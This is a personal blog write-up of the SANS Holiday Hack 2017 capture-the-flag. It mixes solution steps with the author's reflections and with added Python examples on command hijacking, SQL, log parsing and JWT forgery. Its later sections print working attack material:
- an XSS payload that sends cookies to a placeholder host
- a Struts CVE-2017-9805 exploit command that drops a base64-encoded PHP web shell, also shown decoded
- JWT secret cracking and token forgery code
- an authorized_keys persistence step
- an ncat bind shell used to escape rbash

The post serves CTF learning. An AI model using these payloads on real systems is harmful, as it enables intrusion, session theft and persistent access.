Thursday, January 11, 2018

Holiday Hack 2017 Write Up

Just Copy/Pasted this from my write-up.  I'm sick right now, after getting over an illness during the holiday.  Probably plenty of typos and stuff.  Finished it the night it was due.  

Disappointed with myself this year.  Didn't work on it as much as I did other challenges. Sick during holiday break.  First with an infection I was taking antibiotics for.  Then something else.

Reflected over past year.  Brother died last year.  He was young, so this was unexpected.  Christmas was always his favorite time of year.  Wasn't really close to him, but I still regret not spending time with him more often.  You just feel like you have a long time, and then they're gone in the blink of an eye.

So my heart just wasn't in it this year.  Hopefully this is good enough for now.  Might add pics later and hope to solve the rest later.

Update:  I'm adding pics and stuff.  Feeling a little better.  I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups.  For example, I don't just know stuff.  If I really want to learn stuff, I spend a lot of time looking stuff up.  It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others.  Don't be discouraged by these write-ups.  Be encouraged.  If someone like me can do this, so can you. :)  Click on any pictures that look small.  They look much better in the pop up.


Holiday Hack Challenge Banner


Terminals

1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without-sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html

Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The ls output shows that CandyCaneStriper is owned by root with mode rw-r--r--: readable by everyone, but with no execute bit for anyone.
Don't despair. A readable ELF binary can still be run without the execute bit (and without sudo) by invoking the dynamic linker/loader directly and passing the binary as its argument: the loader only has to open and map the file, so read permission is all it needs. The same trick works for any dynamically linked program you can read, so withholding the execute bit does not stop a user who can read the file.

elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper


Candy Cane Striper Solution



Candy Cane Striper Up and Running

2. Linux Command Hijacking Terminal

Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory.
ls -la
Unfortunately, this executable isn't as easy to find as the Candy Cane Striper.
find / -name elftalkd isn't helpful either: the find that the shell resolves for a bare command name is not the real one (an alias, a shell function or a different binary earlier in $PATH shadows it), so it never searches the filesystem.
The real find normally lives at /usr/bin/find, so calling it by its absolute path sidesteps that lookup:
/usr/bin/find / -name elftalkd
This locates our executable. It lives at:
/run/elftalk/bin/elftalkd
So, running it by its absolute path as well,
/run/elftalk/bin/elftalkd
starts it.


ElfTalkd Solution
Elftalkd Running
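The same shadowing mechanism, as an added Python example that is not part of the original write-up: it plants a decoy find at the front of $PATH, shows that a bare find now resolves to the decoy, lists every candidate the way type -a or which -a would (the check worth running whenever a familiar command misbehaves), and shows that the genuine binary, looked up without the decoy directory, is a different file. The decoy script, its output text and the assumption that /bin/sh exists are constructed for the demonstration.

```python
"""$PATH-order command hijacking: a decoy 'find' placed ahead of the real one
wins every bare-name lookup; absolute paths and a which -a style listing expose it."""
import os
import shutil
import stat
import subprocess
import tempfile

# Constructed decoy: a 'find' that ignores its arguments and searches nothing.
DECOY_OUTPUT = "decoy find: searching nothing"
DECOY_SCRIPT = "#!/bin/sh\necho '%s'\n" % DECOY_OUTPUT


def plant_decoy(base_path=None):
    """Create a temp dir holding the decoy and return
    (decoy_path, PATH with that dir first, PATH without it)."""
    clean = base_path if base_path is not None else os.environ.get("PATH", os.defpath)
    tmpdir = tempfile.mkdtemp(prefix="cmd-hijack-")
    decoy = os.path.join(tmpdir, "find")
    with open(decoy, "w") as fh:
        fh.write(DECOY_SCRIPT)
    os.chmod(decoy, os.stat(decoy).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return decoy, tmpdir + os.pathsep + clean, clean


def resolve(command, path):
    """What a bare command name runs as: the first executable match in PATH order."""
    return shutil.which(command, path=path)


def all_candidates(command, path):
    """Every executable named `command` on PATH, in lookup order (type -a / which -a).
    A second entry behind the first means something has been put in front of it."""
    found = []
    for directory in path.split(os.pathsep):
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            found.append(candidate)
    return found


def run_bare(command, path):
    """Run `command` by bare name under PATH; return the first stdout line."""
    proc = subprocess.run([command], env=dict(os.environ, PATH=path),
                          capture_output=True, text=True)
    return proc.stdout.splitlines()[0] if proc.stdout else ""


def demo():
    """Plant the decoy, gather what each lookup method sees, clean up, and
    return the findings as a dict."""
    decoy, hijacked, clean = plant_decoy()
    try:
        candidates = all_candidates("find", hijacked)
        return {
            "decoy": decoy,
            "bare_resolves_to": resolve("find", hijacked),
            "candidates": candidates,
            "decoy_wins": resolve("find", hijacked) == decoy and candidates[0] == decoy,
            "bare_output": run_bare("find", hijacked),
            # Looking the command up without the decoy directory (or calling it by
            # absolute path) never reaches the decoy; None only if the host has no find.
            "genuine": resolve("find", clean),
            "genuine_differs": resolve("find", clean) != decoy,
        }
    finally:
        shutil.rmtree(os.path.dirname(decoy), ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On the challenge terminal the equivalent check is type -a find (or which -a find): if the first entry is not /usr/bin/find, or the shell reports an alias or function, call the real binary by its absolute path.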


3. Troublesome Process Terminal

Use
ps aux
to find the troublesome process; the listing shows it running as PID 8. Then kill it, calling kill by its absolute path so that a hijacked alias, shell function or $PATH entry cannot intercept the call:
/bin/kill -9 8


Troublesome Process Solution
Troublesome Process Not Running


4. Train Startup

The train program was compiled for the ARM architecture, as file reports:
file trainstartup
file -i trainstartup

This terminal's kernel and CPU are x86-64, as uname shows:
uname -a
qemu-arm is QEMU's user-mode emulator: it runs an ARM user-space executable on an x86-64 host by translating the instructions and passing its system calls through to the host kernel. So, simply typing:
qemu-arm ./trainstartup
runs the program.
Train Startup Solution
Train Running

5. IsIt42 Terminal
This one is similar to DLL search-order hijacking on Windows. In other words, we exploit the order in which the Linux dynamic linker resolves symbols from shared libraries. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win
Note: this only works on functions the program imports from a shared library (here rand() from the C library). It does not work on functions defined inside the executable itself, and the loader ignores LD_PRELOAD for setuid/setgid (secure-execution) binaries.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() is a C library function, so the program imports it from libc and the dynamic linker resolves it at run time.
The person that commented the code gave a clue as to what to do because they said that the prototype for rand is: int rand(void);
A library must be written to run in place of the one in the isit42 program.

You may use vim or whatever editor you like. Nano is just one of them.

nano isit42test.c

Type the following (the include is needed for printf):

#include <stdio.h>

/* Same prototype as libc's rand(), so calls resolve to this copy first. */
int rand(void) {
    printf("Hijacking rand() to return 42.\n");
    return 42;
}

Save the file.

Next, compile it as a shared library. The -shared and -fPIC flags are required (their position on the command line doesn't matter); without them gcc won't produce a shared object.
gcc isit42test.c -o isit42test -shared -fPIC
Now the new library must be found before the real C library when the program's symbols are resolved. LD_PRELOAD tells the dynamic loader to load the listed library ahead of all others, so its rand() is the one that wins. The isit42 program is also run during this step.
LD_PRELOAD="$PWD/isit42test" ./isit42
It should return 42.
Cat Sample Program


Highjacking Rand()

Compile New Library - LD Preload
This next part goes by pretty quickly.  When you execute the program with the library preloaded, you'll briefly see it print the message from the printf statement in the library you made ("Hijacking rand() to return 42." above).  That means you successfully hijacked the function.  You should see it return 42.  As long as you preload your library, it will always return 42.


Hijacked Rand() Library

6. Christmas Songs Data Analysis Terminal


Christmas Songs Terminal

sqlite3 is the command-line shell for SQLite database files, and it is often installed on Linux. Open the database with it:
sqlite3 christmassongs.db
To list the tables in the database, use the .tables command.
.tables
To see the columns of a table, use the .schema <table> command.
.schema songs
.schema likes



Christmas Songs DB

There are two tables in the database. To get the most liked song we have to combine the rows of both tables that belong together. In relational databases that is done through primary and foreign keys: songs.id is the primary key of the songs table, and the likes table refers to it through its songid column, a foreign key.
So, part of our query will be "where songs.id=likes.songid".
The table.column notation tells sqlite3 that we mean the id column of the songs table and the songid column of the likes table.
As a database grows, a title may have been inserted more than once. Grouping by title folds every row with the same title into a single result row.
So, part of our query will be "group by songs.title".
Because a title can have several rows, the likes for each title must be added together, which is what SQL's sum function does.
So, part of our query will be sum(likes.like).
We want the most liked song, so we order by that sum in descending order. We limit the query to 10 rows so that only the 10 most liked songs come back. Limiting to one would do, but returning 10 makes it easier to check that the query is working as intended.
The full query is below:

select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;
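The same query run from Python's standard sqlite3 module, as an added example rather than part of the write-up. The rows are constructed, and the table layout is assumed from the columns the query names (songs.id, songs.title, likes.songid, likes.like). The second query groups by songs.id instead of songs.title, which keeps two different rows that merely share a title apart; the sample data is built so the two groupings disagree, to make that difference visible.

```python
"""Answer the 'most liked song' question with Python's built-in sqlite3
module instead of the sqlite3 shell, on a constructed in-memory copy of
the database layout."""
import sqlite3

# Constructed sample rows. 'Jingle Bells' is stored twice (ids 2 and 4):
# the duplicate-title case the write-up's GROUP BY is meant to handle.
SONGS = [
    (1, "Stairway to Heaven"),
    (2, "Jingle Bells"),
    (3, "Silent Night"),
    (4, "Jingle Bells"),
]
# (songid, like): one row per like; 'like' is 1 for a thumbs-up.
LIKES = [(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1), (3, 1), (4, 1), (4, 1)]

# The write-up's query, verbatim.
PAGE_QUERY = """
select sum(likes.like), songs.id, likes.songid, songs.title
from songs, likes
where songs.id = likes.songid
group by songs.title
order by sum(likes.like) desc
limit 10;
"""

# Same idea as an explicit join, grouped by the primary key so that two
# different rows that happen to share a title are not merged.
BY_ID_QUERY = """
select songs.title, sum(likes.like) as total
from songs
join likes on likes.songid = songs.id
group by songs.id
order by total desc, songs.title
limit 10;
"""


def open_sample_db():
    """Build the two-table database in memory and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table songs (id integer primary key, title text);
        create table likes (id integer primary key,
                            songid integer references songs(id),
                            "like" integer);
    """)
    conn.executemany("insert into songs (id, title) values (?, ?)", SONGS)
    conn.executemany('insert into likes (songid, "like") values (?, ?)', LIKES)
    return conn


def list_tables(conn):
    """Equivalent of the shell's .tables command."""
    return [row[0] for row in conn.execute(
        "select name from sqlite_master where type = 'table' order by name")]


def table_columns(conn, table):
    """Equivalent of .schema, reduced to the column names."""
    return [row[1] for row in conn.execute(f"pragma table_info({table})")]


def most_liked_by_title(conn):
    """[(title, total_likes), ...] using the write-up's query."""
    return [(row[3], row[0]) for row in conn.execute(PAGE_QUERY)]


def most_liked_by_id(conn):
    """[(title, total_likes), ...] grouped by songs.id instead of title."""
    return [(row[0], row[1]) for row in conn.execute(BY_ID_QUERY)]


if __name__ == "__main__":
    db = open_sample_db()
    print("tables:", list_tables(db))
    print("likes columns:", table_columns(db, "likes"))
    print("by title:", most_liked_by_title(db))
    print("by id:   ", most_liked_by_id(db))
```

On this data the title grouping crowns "Jingle Bells" (two rows, four likes in total) while the id grouping crowns "Stairway to Heaven" (one row, three likes). Which one is "right" depends on whether duplicate titles are the same song entered twice or genuinely different recordings; run both and compare before trusting a single answer.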


Christmas Songs DB Query
Looks like the Answer is Stairway to Heaven.  We'll run the program "runtoanswer" to be sure.
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer


Christmas DB Number 1 Song

7. Web Log Terminal Challenge
Web Log Terminal
The goal of this challenge was to analyze an Apache access log to find the least common browser. Fortunately, it is plain text with well-defined delimiters, so with a decent understanding of a few Linux command-line tools it shouldn't be tough. If not, Google is your friend; there are many ways to solve this one. Here is one way:
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - sends the contents of the log file to the next command.

awk -F\" '{print $6}' | - the fields in this log are delimited by the " character. Split each line on that delimiter and print only the 6th field, which is the User-Agent string. Send the 6th field to the next command.
sort -n | - sorts the user-agent strings so that identical ones are adjacent, which uniq needs in order to count them (the -n is harmless here but does nothing useful on text). Send that output to the next command.
uniq -c | - collapses each run of identical lines into one line, prefixed with how many times it occurred. Send those to the next command.
sort -n | - sorts the counted lines numerically by that count. Send that output to the next command.
head -n 10 - shows only the first 10 lines. Since sort's default order is ascending, the first line is the least used user agent.
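The same analysis in Python, as an added example that is not from the write-up, on a constructed seven-line log: it pulls the sixth quote-delimited field exactly as the awk stage does, counts like sort | uniq -c, orders ascending like sort -n, and skips lines that don't have the expected shape, which the shell pipeline would silently count under an empty user agent.

```python
r"""Find the least common User-Agent in an Apache combined access log.
Each line has six double-quoted fields; splitting on '"' puts the
User-Agent at index 5, the same field awk -F\" '{print $6}' selects."""
from collections import Counter

# Constructed sample log (not the challenge's access.log): three Firefox
# hits, two Chrome hits, one Dillo hit and one malformed line.
SAMPLE_LOG = """\
10.0.0.1 - - [10/Jan/2018:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/57.0"
10.0.0.2 - - [10/Jan/2018:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/57.0"
10.0.0.3 - - [10/Jan/2018:10:00:03 +0000] "GET /about HTTP/1.1" 404 210 "http://example.test/" "Mozilla/5.0 (Windows NT 10.0) Chrome/63.0"
10.0.0.1 - - [10/Jan/2018:10:00:04 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/57.0"
10.0.0.4 - - [10/Jan/2018:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Dillo/3.0.5"
10.0.0.3 - - [10/Jan/2018:10:00:06 +0000] "GET /logo.png HTTP/1.1" 200 8192 "http://example.test/" "Mozilla/5.0 (Windows NT 10.0) Chrome/63.0"
this line is not an access log entry
"""


def user_agent(line):
    """Return the User-Agent field of one combined-log line, or None if the
    line does not carry the expected six quoted fields (seven pieces)."""
    fields = line.split('"')
    return fields[5] if len(fields) >= 7 else None


def user_agent_counts(log_text):
    """Count requests per User-Agent (the sort | uniq -c stage)."""
    counts = Counter()
    for line in log_text.splitlines():
        agent = user_agent(line)
        if agent is not None:
            counts[agent] += 1
    return counts


def least_common_user_agents(log_text, n=10):
    """The n rarest User-Agents as (agent, count), rarest first (the
    sort -n | head -n 10 stage); ties are broken by name for stable output."""
    counts = user_agent_counts(log_text)
    return sorted(counts.items(), key=lambda item: (item[1], item[0]))[:n]


if __name__ == "__main__":
    for agent, count in least_common_user_agents(SAMPLE_LOG):
        print(f"{count:7d} {agent}")
```

A rare user agent is also a cheap hunting lead: scanners, command-line clients and hand-crafted requests usually show up at the bottom of exactly this list.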


After running cat access.log ...


Web Terminal Challenge Answer
8. Shadow Restoration Challenge
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for 
man sudo - found a switch to run as a group. (I did this on another linux box.  The game terminal wouldn't let me do it.)

The goal of this one is to restore the shadow file from a backup.
Fortunately, this user has a sudo rule. What it allows can be found by running:
sudo -l


Shadow Terminal

This user can run the find command.  You can see that near the bottom, where it says "User elf may run the following commands...".  The rule also says NOPASSWD, so no password is needed for it, and the "(elf : shadow)" part says the command may be run as user elf with group shadow.
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, sudo asks for elf's password: without -u or -g, sudo tries to run the command as root, which this rule does not allow, so the NOPASSWD entry never matches. Unfortunately, that password is not known.
sudo can run a command as another user or with another group. No user's password is known, so use the -g switch to pick the group the rule allows; with -g and no -u, sudo keeps the invoking user (elf) and only changes the group, which is exactly what "(elf : shadow)" permits. On Linux the shadow group is the group granted access to /etc/shadow, the file holding the password hashes. The following command works, without a password:
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is find's placeholder for the file it matched, here /etc/shadow.bak. One could write /etc/shadow.bak in place of the {} and it would work just fine; the {} syntax is just shorter.
The command says, "run as a member of the shadow group", "find the shadow backup", "overwrite the shadow file with the shadow backup". Note that a sudo rule for find is broad: -exec lets it run any command as that user and group, not just cp.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box


Shadow File Successfully Restored

Holiday Hack Challenge Questions
1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

The title of that page is About This Book.

2) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?


Alabaster Snowball Password

The topic of this page is flying animals. Alabaster Snowball's password is stream_unhappy_buy_loss.

3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?
FileStor. For the record, I could log onto IPC$ as well. Just couldn’t get a directory listing. Seemed to let me change to another directory, though. Also, it gives a different error message when I try to write to the directory using “put” so it might be writable. FileStor gives NT_STATUS_ACCESS_DENIED opening remote file \test when I try to put test to it. IPC$ gives NT_STATUS_OBJECT_NAME_NOT_FOUND error when I try to put a test file to it.
SSH Port Forwarding to SMB Server
SMB Protocol Via Browser
Finder Asking Permission To Access Share
Entering Alabaster's Creds to Access Share
Selecting Share
Contents of FileStor

4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?


SSH Port Forwarding to Mail Server
Setting Up Browser Proxy - Firefox

E-Mail Showing Where Page 4 Was On the Mail Server.

Mail Server - Page 4 - Rise of the Lollipop Guild

Elves and Munchkins don’t like each other. They have a long-standing feud. It’s never been proven, but the Elves believe that the Munchkins have sent Munchkin Moles to the North Pole.

5) How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain, and what is your proof?

a) 8 infractions are required to be marked as naughty on Santa’s Naughty and Nice List. (The lowest amount of infractions I could find for a naughty person was 8).

b) The insider moles are: Bog Questrian, Bini Aru - these two are known because they were mentioned in the BOLO:Munchkin Mole Advisory. 

Known Munchkin Moles
To find the other names of elves, I assume one can compare the traits mentioned in the hints in the Stocking like fighting, pulling hair, throwing rocks at people, and giving atomic wedgies to the individuals listed in the Infractions directory. One could also see the highest offenders in the list - i.e. the ones with the most total coal. It’s profiling, but it may give a good indication of who is likely to be a mole. Another thought that I had logging into each suspicious individual’s e-mail account if possible and seeing if there were any e-mails that contained damning evidence.

c) The Abominable Snow Monster, AKA Bumble, is throwing the giant snowballs - a page of The Great Book states that he's throwing the snowballs - however, he's under the influence of something magical that he ate.  (If one plays through the game, it's revealed that he is throwing snowballs as well.)


Great Book Page 5

Game Reveal

6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?


SSH Port Forwarding to EAAS
I posted the picture of setting up a proxy in the browser earlier.  By now, it should be clear.  The SSH Port Forwarding requires different ports.  FYI, you can set up the port forwarding all at once, I just don't like to have a lot of stuff listening.  So, you could go:

ssh -L 9000:10.142.0.5:80 alabaster_snowball@l2s.northpolechristmastown.com
ssh -L 9001:10.142.0.13:80 alabaster_snowball@l2s.northpolechristmastown.com
etc.  Then you'd just set up different proxies for each of them.  It's all about personal preference.

Great Book Page 6 Dreaded Inter-Dimensional Tornadoes
The title of The Great book page is: The Dreaded Inter-Dimensional Tornadoes.

7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?

I know from exploiting the e-mail server that one should probably use a DDE injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words "gingerbread", "cookie" and "recipe". Shinny Upatree also gives the hint in the stocking talking about DDE.  He also said that he was reprimanded for a security violation and that Alabaster installs unnecessary software on the EMI server all the time, including Microsoft Office.  DDE injection can be done with Word, Excel, Outlook, PowerPoint - probably more - but those are the products I've seen it done with in articles.


SSH Port Forwarding To Mail Server

Setting Up Proxy in Browser - Firefox

Alabaster Hinting he will click on anything regarding gingerbread cookies.
Tarpin McJinglehauser stating to be on the lookout for certain e-mails.
Minty hinting that they may be vulnerable to DDE Injection.
Alabaster pulling down the file using nc.
Alabaster stating that he has nc installed to his $PATH.
Alabaster stating that they have powershell.


Shinny Upatree Reprimanded

Shinny Upatree Unnecessary Software
Unfortunately, I couldn’t get any of my exploit attempts to work. I’ll detail my attempts later in this write-up.

8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

I just got into the edb/ldap server on the night that this was due, so I didn't get this one.  I did get it afterwards though.  I'm holding off on reading write-ups until I solve them.  It was the Wizard of Oz. :)


I retrieved the np-auth token via XSS.  I knew that I needed the np-auth item because of the web page source code.  Click on the Support link and find the XSS vulnerability.  You can use a marker to test, or simply try to pop an alert.


EDB Server
EDB Support Page
EDB Source
It kept saying "Alert, Hacker" when I tried certain XSS payloads.  I just played around with it a bit to find out what it was filtering on.  An easier way would have been to check to see if there was any script that contained "Alert, Hacker!".  It didn't take long to figure out what it was alerting on, though.  It was just the word script.  So, I'd have to try payloads that either obfuscated the word "script" or payloads that didn't contain the word script.


XSS Marker Script
It won't let you put the marker in the Username and E-Mail because they have to be a certain format.  So, put a valid username and e-mail in each text box and add the marker script to the message.  Check the web page source code.


Message Vulnerable to XSS
Looks like the Message part is vulnerable.  When you look at the source code, that is where this is located.

Try filter evasion payloads until one pops an alert.


Try Payloads Until One Pops an alert
XSS Alert Success!
Now, change the payload so it dials back to you.


<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>

I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine.  The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth.  I just named it cookie catcher.php because I originally thought I needed a cookie.  I only set it up this way because I wanted to be certain I didn't miss it.  This script saves the cookies to a log that I can look at later.

I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap. 


Alabaster's JWT Token


Blank Key
Decoding Alabaster's JWT Token With PyJWT

I cracked the secret using jwtcrack. It was ‘3lv3s’. 


Cracking JWT Secret With jwtcrack

I then used py-jwt to forge a new token with the decoded token and changing the “expires” date. 


Forging Alabaster Snowball's JWT Token
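The three steps above (decode, crack, forge) in one added Python example that uses only the standard library in place of pyjwt and jwtcrack; it is not the write-up's own code. Reading the claims needs no key because a JWT payload is only base64url-encoded; it is the signature check that needs the secret. The sample token, its claims and the wordlist are constructed here, signed with the weak secret the write-up recovered, so the dictionary attack is guaranteed to succeed on it.

```python
"""Work with an HS256 JSON Web Token the way the write-up does with pyjwt and
jwtcrack: read its claims without a key, recover a weak secret by dictionary
attack, and re-sign a modified payload."""
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    """JWT base64url: URL-safe alphabet with the '=' padding stripped."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Restore the padding the JWT encoding drops, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str):
    """Return (header, payload). No key is needed: the claims are only
    base64url-encoded, not encrypted. This proves nothing about authenticity."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(payload: dict, secret: str) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the first two parts."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [b64url_encode(json.dumps(part, separators=(",", ":")).encode())
             for part in (header, payload)]
    signing_input = ".".join(parts)
    signature = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(signature)


def verify_hs256(token: str, secret: str) -> bool:
    """True only if the header says HS256 and the signature matches the secret."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return False  # never let the token pick a weaker algorithm (alg confusion)
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(signature_b64))


def crack_hs256_secret(token: str, wordlist):
    """Dictionary attack: the first candidate that verifies the token is the secret."""
    for candidate in wordlist:
        if verify_hs256(token, candidate):
            return candidate
    return None


def forge_token(token: str, secret: str, **claim_updates) -> str:
    """Copy the claims out of an existing token, change some, and re-sign."""
    _header, payload = decode_unverified(token)
    payload.update(claim_updates)
    return sign_hs256(payload, secret)


# Constructed sample: claims shaped like the write-up describes (an LDAP-ish
# uid plus an "expires" field), signed with the weak secret the write-up found.
SAMPLE_SECRET = "3lv3s"
SAMPLE_CLAIMS = {"uid": "alabaster.snowball", "ou": "elf",
                 "expires": "2017-08-16 12:00:47+00:00"}
SAMPLE_TOKEN = sign_hs256(SAMPLE_CLAIMS, SAMPLE_SECRET)
# Constructed wordlist; a real attack uses a large list or brute force, as jwtcrack does.
WORDLIST = ["password", "santa", "elves", "northpole", "3lv3s", "Christmas2017"]

if __name__ == "__main__":
    print("claims without key:", decode_unverified(SAMPLE_TOKEN)[1])
    secret = crack_hs256_secret(SAMPLE_TOKEN, WORDLIST)
    print("cracked secret:", secret)
    forged = forge_token(SAMPLE_TOKEN, secret, expires="2030-01-01 00:00:00+00:00")
    print("forged token verifies:", verify_hs256(forged, secret))
```

A secret short enough to fall to jwtcrack should be replaced by at least 32 random bytes, and the verifier must pin the algorithm rather than trust the token's alg header, as verify_hs256 does.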

9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?

Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
Glenda did it.  Can't say I'm surprised.  I always suspected she was up to no good.
L2S Server

This server was running Apache Struts, and was vulnerable to the exploit detailed here:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The webpage indicated that there was another website. dev.northpolechristmastown.com.


Dev Version of L2S


The Dev Version shows that it's running Apache Struts.


Running Apache Struts
I used the tool mentioned in the SANS Pen Testing Blog Post mentioned earlier to upload a web shell:  CVE-2017-9805.py  I named it struts_exploit.py so I would remember what it was way in the future.

python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo 'PGh0bWw+Cjxib2R5Pgo8Zm9ybSBtZXRob2Q9IkdFVCIgbmFtZT0iPD9waHAgZWNobyBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+Ij4KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPgo8aW5wdXQgdHlwZT0iU1VCTUlUIiB2YWx1ZT0iRXhlY3V0ZSI+CjwvZm9ybT4KPHByZT4KPD9waHAKICAgIGlmKCRfR0VUWydjbWQnXSkKICAgIHsKICAgICAgICBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKICAgIH0KPz4KPC9wcmU+CjwvYm9keT4KPHNjcmlwdD5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY21kIikuZm9jdXMoKTs8L3NjcmlwdD4KPC9odG1sPg==' > /var/www/html/quackquackhere.php"

That base64 is a web shell.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php if ($_GET['cmd']) { system($_GET['cmd']); } ?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>


Then you just visit the webpage with your shell's file name tacked on the end and the command you want to run in the cmd parameter (the shell reads $_GET['cmd'] and hands it to system(), so it runs with the web server's privileges):

https://l2s.northpolechristmastown.com/quackquackhere.php?cmd=ls


I found it easier to upload my public key into the authorized_keys file and log on via ssh before I found the password. Unfortunately, logging in via ssh left me in a restricted shell.

python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo '<my pub key here>' >> /home/alabaster.snowball/.ssh/authorized_keys"


Pub Key
I'm not afraid of people having my public key.  Now if I showed my private key, that would be another story.  I'm reverting to a snap shot on that VM though.  So the key won't be on there at any rate whether it's safe or not.

Then I could just ssh in, presenting my private key.  Learned this in NetWars. :)  Like so:

ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com

Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot-of-tee, to break out of rbash. I was unsuccessful. 

I found out that I could do dot (.) sourcing to get around not being able to use ./ to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.

https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it

Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that was restricting users to the directory I was in and the path to the programs I was able to run in the restricted shell. 

cat /home/alabaster.snowball/.bashrc


Restricting Users to RBash

So then I did “ls /usr/local/rbin” to see what programs I could use. 


What Can I Execute In RBash?
I've used ncat several times and remembered that I could execute commands with it. So I tried ncat -l 59000 --exec "/bin/bash" &. Then I connected to my listener by typing ncat 127.0.0.1 59000. 


Escaped From RBash
